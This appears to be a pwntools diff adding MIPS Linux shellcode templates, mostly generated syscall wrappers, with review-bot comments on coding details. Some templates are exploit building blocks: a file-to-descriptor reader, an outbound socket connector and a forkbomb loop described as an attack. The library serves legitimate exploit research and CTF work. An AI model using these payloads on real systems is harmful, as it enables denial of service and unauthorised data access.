@@ -0,0 +1,24 @@ +<% + from pwnlib import constants + from pwnlib.shellcraft import mips + from pwnlib.shellcraft import common +%> +<%page args="filename, fd=1"/> +<%docstring> +Opens a file and writes its contents to the specified file descriptor. + +Example: + + >>> f = tempfile.mktemp() + >>> write(f, 'FLAG') + >>> run_assembly(shellcraft.mips.linux.cat(f)).recvall() + 'FLAG' + + +<% +label = common.label("sendfile_loop") +%> + + ${mips.pushstr(filename)} + ${mips.open('$sp', 0, int(constants.O_RDONLY))} + ${mips.sendfile(fd, '$v0', 0, 0x7fffffff)} diff --git a/pwnlib/shellcraft/templates/mips/linux/chdir.asm b/pwnlib/shellcraft/templates/mips/linux/chdir.asm new file mode 100644 index 000000000..58398837d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/mips/linux/chmod.asm b/pwnlib/shellcraft/templates/mips/linux/chmod.asm new file mode 100644 index 000000000..696a9dfa3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/mips/linux/chown.asm b/pwnlib/shellcraft/templates/mips/linux/chown.asm new file mode 100644 index 000000000..5bb3330d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/chown.asm 
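Review bot: `label = common.label("sendfile_loop")` in cat.asm is assigned but never emitted, so it is dead code left over from a loop the single `sendfile` call replaced; the whole `<% %>` block can go. On the `mips.open('$sp', 0, int(constants.O_RDONLY))` line, `O_RDONLY` sits in the third (mode) slot and the flags slot gets a literal 0, assuming `mips.open` follows the `open(2)` argument order; it only works because `O_RDONLY` is 0, so `mips.open('$sp', int(constants.O_RDONLY), 0)` says what is meant. The docstring would also benefit from an Arguments entry stating that `fd` defaults to 1 (stdout) and that the descriptor returned by open is taken from `$v0` without an error check.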
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/mips/linux/chroot.asm b/pwnlib/shellcraft/templates/mips/linux/chroot.asm new file mode 100644 index 000000000..e9bce66eb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/mips/linux/clock_getres.asm b/pwnlib/shellcraft/templates/mips/linux/clock_getres.asm new file mode 100644 index 000000000..d20618a82 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/mips/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/mips/linux/clock_gettime.asm new file mode 100644 index 000000000..40abeef91 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/mips/linux/clock_nanosleep.asm new file mode 100644 index 000000000..5e8219a34 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/mips/linux/clock_settime.asm b/pwnlib/shellcraft/templates/mips/linux/clock_settime.asm new file mode 100644 index 000000000..a60b32f0a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/clone.asm b/pwnlib/shellcraft/templates/mips/linux/clone.asm new file mode 100644 index 000000000..90ff240b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/close.asm b/pwnlib/shellcraft/templates/mips/linux/close.asm new file mode 100644 index 000000000..ae1d4dbf7 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/mips/linux/connect.asm b/pwnlib/shellcraft/templates/mips/linux/connect.asm new file mode 100644 index 000000000..e5288024c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/connect.asm @@ -0,0 +1,26 @@ +<% + from pwnlib.shellcraft.mips import push, mov, pushstr + from pwnlib.shellcraft.mips.linux import syscall + from pwnlib.constants import SOCK_STREAM, SYS_socket, SYS_connect + from pwnlib.util.net import sockaddr +%> +<%page args="host, port, network='ipv4'"/> +<%docstring> + Connects to the host on the specified port. + Network is either 'ipv4' or 'ipv6'. + Leaves the connected socket in $s0. + +<% + sockaddr, addr_len, address_family = sockaddr(host, port, network) +%>\ +/* open new socket */ + ${syscall(SYS_socket, address_family, SOCK_STREAM, 0)} + +/* save opened socket */ + ${mov('$s0', '$v0')} + +/* push sockaddr, connect() */ + ${pushstr(sockaddr, False)} + ${syscall(SYS_connect, '$s0', '$sp', addr_len)} + +/* Socket that is maybe connected is in $s0 */ diff --git a/pwnlib/shellcraft/templates/mips/linux/creat.asm b/pwnlib/shellcraft/templates/mips/linux/creat.asm new file mode 100644 index 000000000..2d10f8e51 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/creat.asm 
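Review bot: In connect.asm, `sockaddr, addr_len, address_family = sockaddr(host, port, network)` rebinds the name of the imported helper to its own result; it works once but reads as a bug, so `sa, addr_len, address_family = sockaddr(host, port, network)` with `pushstr(sa, False)` is clearer. `push` is imported and unused. The docstring should list `host`, `port` and `network='ipv4'` in the Arguments style the generated templates use, and state that `$s0` holds the socket while `$v0`, the stack below `$sp` and whichever registers the `syscall` wrapper loads are clobbered; the closing comment already admits the connect result is unchecked, which belongs in the docstring too.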
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="file, mode"/>
+<%docstring>
+Invokes the syscall creat. See 'man 2 creat' for more information.
+
+Arguments:
+ file(char): file
+ mode(mode_t): mode
+
+
+ ${syscall('SYS_creat', file, mode)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/dup.asm b/pwnlib/shellcraft/templates/mips/linux/dup.asm
new file mode 100644
index 000000000..7f31830b5
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/dup.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd"/>
+<%docstring>
+Invokes the syscall dup. See 'man 2 dup' for more information.
+
+Arguments:
+ fd(int): fd
+
+
+ ${syscall('SYS_dup', fd)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/dup2.asm b/pwnlib/shellcraft/templates/mips/linux/dup2.asm
new file mode 100644
index 000000000..fd03c7fb2
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/dup2.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, fd2"/>
+<%docstring>
+Invokes the syscall dup2. See 'man 2 dup2' for more information.
+
+Arguments:
+ fd(int): fd
+ fd2(int): fd2
+
+
+ ${syscall('SYS_dup2', fd, fd2)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/dup3.asm b/pwnlib/shellcraft/templates/mips/linux/dup3.asm
new file mode 100644
index 000000000..73f0f1728
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/dup3.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, fd2, flags"/>
+<%docstring>
+Invokes the syscall dup3. See 'man 2 dup3' for more information.
+
+Arguments:
+ fd(int): fd
+ fd2(int): fd2
+ flags(int): flags
+
+
+ ${syscall('SYS_dup3', fd, fd2, flags)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/echo.asm b/pwnlib/shellcraft/templates/mips/linux/echo.asm
new file mode 100644
index 000000000..dc10cb814
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/echo.asm
@@ -0,0 +1,6 @@
+<% from pwnlib.shellcraft import mips %>
+<%page args="string, sock = 1"/>
+<%docstring>Writes a string to a file descriptor
+
+${mips.pushstr(string, append_null = False)}
+${mips.linux.syscall('SYS_write', sock, '$sp', len(string))}
diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_create.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_create.asm
new file mode 100644
index 000000000..9f515a336
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/epoll_create.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="size"/>
+<%docstring>
+Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information.
+
+Arguments:
+ size(int): size
+
+
+ ${syscall('SYS_epoll_create', size)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_create1.asm
new file mode 100644
index 000000000..4fb55efe4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/epoll_create1.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="flags"/>
+<%docstring>
+Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information.
+
+Arguments:
+ flags(int): flags
+
+
+ ${syscall('SYS_epoll_create1', flags)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_ctl.asm
new file mode 100644
index 000000000..054f17d4a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/epoll_ctl.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="epfd, op, fd, event"/>
+<%docstring>
+Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information.
+
+Arguments:
+ epfd(int): epfd
+ op(int): op
+ fd(int): fd
+ event(epoll_event): event
+
+
+ ${syscall('SYS_epoll_ctl', epfd, op, fd, event)}
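Review bot: The docstring of echo.asm has no Arguments section, unlike the generated syscall templates in this series, so `string` and the `sock = 1` default go undocumented; it should list `string(str): data to write` and `sock(int): file descriptor to write to, defaults to 1 (stdout)`. The write length is taken from `len(string)` while the data is pushed by `mips.pushstr(string, append_null = False)`, so the two agree only when `string` is a plain byte string whose length pushstr preserves; if pushstr accepts anything else, that assumption is worth stating in the docstring.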
diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_pwait.asm
new file mode 100644
index 000000000..38e2779aa
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/epoll_pwait.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="epfd, events, maxevents, timeout, ss"/>
+<%docstring>
+Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information.
+
+Arguments:
+ epfd(int): epfd
+ events(epoll_event): events
+ maxevents(int): maxevents
+ timeout(int): timeout
+ ss(sigset_t): ss
+
+
+ ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_wait.asm
new file mode 100644
index 000000000..2c02f7423
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/epoll_wait.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="epfd, events, maxevents, timeout"/>
+<%docstring>
+Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information.
+
+Arguments:
+ epfd(int): epfd
+ events(epoll_event): events
+ maxevents(int): maxevents
+ timeout(int): timeout
+
+
+ ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/execve.asm b/pwnlib/shellcraft/templates/mips/linux/execve.asm
new file mode 100644
index 000000000..9e3cca18b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/execve.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="path, argv, envp"/>
+<%docstring>
+Invokes the syscall execve. See 'man 2 execve' for more information.
+
+Arguments:
+ path(char): path
+ argv(char): argv
+ envp(char): envp
+
+
+ ${syscall('SYS_execve', path, argv, envp)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/exit.asm b/pwnlib/shellcraft/templates/mips/linux/exit.asm
new file mode 100644
index 000000000..311ba9a6d
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/exit.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="status"/>
+<%docstring>
+Invokes the syscall exit. See 'man 2 exit' for more information.
+
+Arguments:
+ status(int): status
+
+
+ ${syscall('SYS_exit', status)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/faccessat.asm b/pwnlib/shellcraft/templates/mips/linux/faccessat.asm
new file mode 100644
index 000000000..002dbc3c5
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/faccessat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, file, type, flag"/>
+<%docstring>
+Invokes the syscall faccessat. See 'man 2 faccessat' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ type(int): type
+ flag(int): flag
+
+
+ ${syscall('SYS_faccessat', fd, file, type, flag)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fallocate.asm b/pwnlib/shellcraft/templates/mips/linux/fallocate.asm
new file mode 100644
index 000000000..b1c2c596c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fallocate.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, mode, offset, len"/>
+<%docstring>
+Invokes the syscall fallocate. See 'man 2 fallocate' for more information.
+
+Arguments:
+ fd(int): fd
+ mode(int): mode
+ offset(off_t): offset
+ len(off_t): len
+
+
+ ${syscall('SYS_fallocate', fd, mode, offset, len)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fchdir.asm b/pwnlib/shellcraft/templates/mips/linux/fchdir.asm
new file mode 100644
index 000000000..54cdb077e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fchdir.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd"/>
+<%docstring>
+Invokes the syscall fchdir. See 'man 2 fchdir' for more information.
+
+Arguments:
+ fd(int): fd
+
+
+ ${syscall('SYS_fchdir', fd)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fchmod.asm b/pwnlib/shellcraft/templates/mips/linux/fchmod.asm
new file mode 100644
index 000000000..63b9b473b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fchmod.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, mode"/>
+<%docstring>
+Invokes the syscall fchmod. See 'man 2 fchmod' for more information.
+
+Arguments:
+ fd(int): fd
+ mode(mode_t): mode
+
+
+ ${syscall('SYS_fchmod', fd, mode)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fchmodat.asm b/pwnlib/shellcraft/templates/mips/linux/fchmodat.asm
new file mode 100644
index 000000000..f5a165652
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fchmodat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, file, mode, flag"/>
+<%docstring>
+Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ mode(mode_t): mode
+ flag(int): flag
+
+
+ ${syscall('SYS_fchmodat', fd, file, mode, flag)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fchown.asm b/pwnlib/shellcraft/templates/mips/linux/fchown.asm
new file mode 100644
index 000000000..859a44923
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fchown.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, owner, group"/>
+<%docstring>
+Invokes the syscall fchown. See 'man 2 fchown' for more information.
+
+Arguments:
+ fd(int): fd
+ owner(uid_t): owner
+ group(gid_t): group
+
+
+ ${syscall('SYS_fchown', fd, owner, group)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fchownat.asm b/pwnlib/shellcraft/templates/mips/linux/fchownat.asm
new file mode 100644
index 000000000..e718180b5
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fchownat.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, file, owner, group, flag"/>
+<%docstring>
+Invokes the syscall fchownat. See 'man 2 fchownat' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ owner(uid_t): owner
+ group(gid_t): group
+ flag(int): flag
+
+
+ ${syscall('SYS_fchownat', fd, file, owner, group, flag)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fcntl.asm b/pwnlib/shellcraft/templates/mips/linux/fcntl.asm
new file mode 100644
index 000000000..237327d40
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fcntl.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, cmd, vararg"/>
+<%docstring>
+Invokes the syscall fcntl. See 'man 2 fcntl' for more information.
+
+Arguments:
+ fd(int): fd
+ cmd(int): cmd
+ vararg(int): vararg
+
+
+ ${syscall('SYS_fcntl', fd, cmd, vararg)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fdatasync.asm b/pwnlib/shellcraft/templates/mips/linux/fdatasync.asm
new file mode 100644
index 000000000..8eb26471d
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fdatasync.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fildes"/>
+<%docstring>
+Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information.
+
+Arguments:
+ fildes(int): fildes
+
+
+ ${syscall('SYS_fdatasync', fildes)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/flock.asm b/pwnlib/shellcraft/templates/mips/linux/flock.asm
new file mode 100644
index 000000000..364f6a9a1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/flock.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, operation"/>
+<%docstring>
+Invokes the syscall flock. See 'man 2 flock' for more information.
+
+Arguments:
+ fd(int): fd
+ operation(int): operation
+
+
+ ${syscall('SYS_flock', fd, operation)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fork.asm b/pwnlib/shellcraft/templates/mips/linux/fork.asm
new file mode 100644
index 000000000..54090ce61
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fork.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall fork. See 'man 2 fork' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_fork')}
diff --git a/pwnlib/shellcraft/templates/mips/linux/forkbomb.asm b/pwnlib/shellcraft/templates/mips/linux/forkbomb.asm
new file mode 100644
index 000000000..00c564c6e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/forkbomb.asm
@@ -0,0 +1,15 @@
+<%
+ from pwnlib.shellcraft.mips import nop
+ from pwnlib.shellcraft.mips.linux import fork
+ from pwnlib.shellcraft.common import label
+%>
+<%docstring>
+Performs a forkbomb attack.
+
+<%
+ dosloop = label('fork_bomb')
+%>
+${dosloop}:
+ ${fork()}
+ beq $at, $at, ${dosloop}
+ ${nop()}
diff --git a/pwnlib/shellcraft/templates/mips/linux/forkexit.asm b/pwnlib/shellcraft/templates/mips/linux/forkexit.asm
new file mode 100644
index 000000000..0577adc8a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/forkexit.asm
@@ -0,0 +1,15 @@
+<%
+ from pwnlib.shellcraft import common
+ from pwnlib.shellcraft.mips.linux import fork, exit
+%>
+<%page args=""/>
+<%docstring>
+Attempts to fork. If the fork is successful, the parent exits.
+
+<%
+dont_exit = common.label('forkexit')
+%>
+ ${fork()}
+ blez $v0, ${dont_exit}
+ ${exit(0)}
+${dont_exit}:
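Review bot: In forkexit.asm the `blez $v0, ${dont_exit}` branch is not followed by a delay-slot instruction, so the first instruction expanded from `${exit(0)}` is executed in the branch delay slot on the child path as well as the parent path; forkbomb.asm in the same hunk group places `${nop()}` after its `beq` for exactly this reason, and forkexit should do the same, i.e. `blez $v0, ${dont_exit}` / `${nop()}` / `${exit(0)}` (the `nop` import would be needed too). killparent.asm has the same gap: its final `beq $v0, $zero, ${killparent_loop}` leaves the delay slot to whatever instruction follows the template, which the docstring should at least point out. Separately, the branch treats every value of $v0 <= 0 as "not the parent"; if the MIPS o32 convention of returning a positive errno in $v0 and flagging the error in $a3 applies here, a failed fork would be mistaken for the parent path and exit, which is worth a comment or an `$a3` check if that case matters.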
diff --git a/pwnlib/shellcraft/templates/mips/linux/fstat.asm b/pwnlib/shellcraft/templates/mips/linux/fstat.asm
new file mode 100644
index 000000000..1f562ba5f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fstat.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, buf"/>
+<%docstring>
+Invokes the syscall fstat. See 'man 2 fstat' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(stat): buf
+
+
+ ${syscall('SYS_fstat', fd, buf)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fstat64.asm b/pwnlib/shellcraft/templates/mips/linux/fstat64.asm
new file mode 100644
index 000000000..93079a24b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fstat64.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, buf"/>
+<%docstring>
+Invokes the syscall fstat64. See 'man 2 fstat64' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(stat64): buf
+
+
+ ${syscall('SYS_fstat64', fd, buf)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fstatat64.asm b/pwnlib/shellcraft/templates/mips/linux/fstatat64.asm
new file mode 100644
index 000000000..723a1f833
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fstatat64.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, file, buf, flag"/>
+<%docstring>
+Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ buf(stat64): buf
+ flag(int): flag
+
+
+ ${syscall('SYS_fstatat64', fd, file, buf, flag)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/fsync.asm b/pwnlib/shellcraft/templates/mips/linux/fsync.asm
new file mode 100644
index 000000000..97b4a9c31
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/fsync.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd"/>
+<%docstring>
+Invokes the syscall fsync. See 'man 2 fsync' for more information.
+
+Arguments:
+ fd(int): fd
+
+
+ ${syscall('SYS_fsync', fd)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/ftruncate.asm b/pwnlib/shellcraft/templates/mips/linux/ftruncate.asm
new file mode 100644
index 000000000..4f52cb097
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/ftruncate.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, length"/>
+<%docstring>
+Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information.
+
+Arguments:
+ fd(int): fd
+ length(off_t): length
+
+
+ ${syscall('SYS_ftruncate', fd, length)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/mips/linux/ftruncate64.asm
new file mode 100644
index 000000000..296f2ee30
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/ftruncate64.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, length"/>
+<%docstring>
+Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information.
+
+Arguments:
+ fd(int): fd
+ length(off64_t): length
+
+
+ ${syscall('SYS_ftruncate64', fd, length)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/futimesat.asm b/pwnlib/shellcraft/templates/mips/linux/futimesat.asm
new file mode 100644
index 000000000..285d3e5d9
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/futimesat.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, file, tvp"/>
+<%docstring>
+Invokes the syscall futimesat. See 'man 2 futimesat' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ tvp(timeval): tvp
+
+
+ ${syscall('SYS_futimesat', fd, file, tvp)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getcwd.asm b/pwnlib/shellcraft/templates/mips/linux/getcwd.asm
new file mode 100644
index 000000000..bf47fb786
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getcwd.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="buf, size"/>
+<%docstring>
+Invokes the syscall getcwd. See 'man 2 getcwd' for more information.
+
+Arguments:
+ buf(char): buf
+ size(size_t): size
+
+
+ ${syscall('SYS_getcwd', buf, size)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getegid.asm b/pwnlib/shellcraft/templates/mips/linux/getegid.asm
new file mode 100644
index 000000000..ae0d355cf
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getegid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getegid. See 'man 2 getegid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getegid')}
diff --git a/pwnlib/shellcraft/templates/mips/linux/geteuid.asm b/pwnlib/shellcraft/templates/mips/linux/geteuid.asm
new file mode 100644
index 000000000..eb503fadb
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/geteuid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
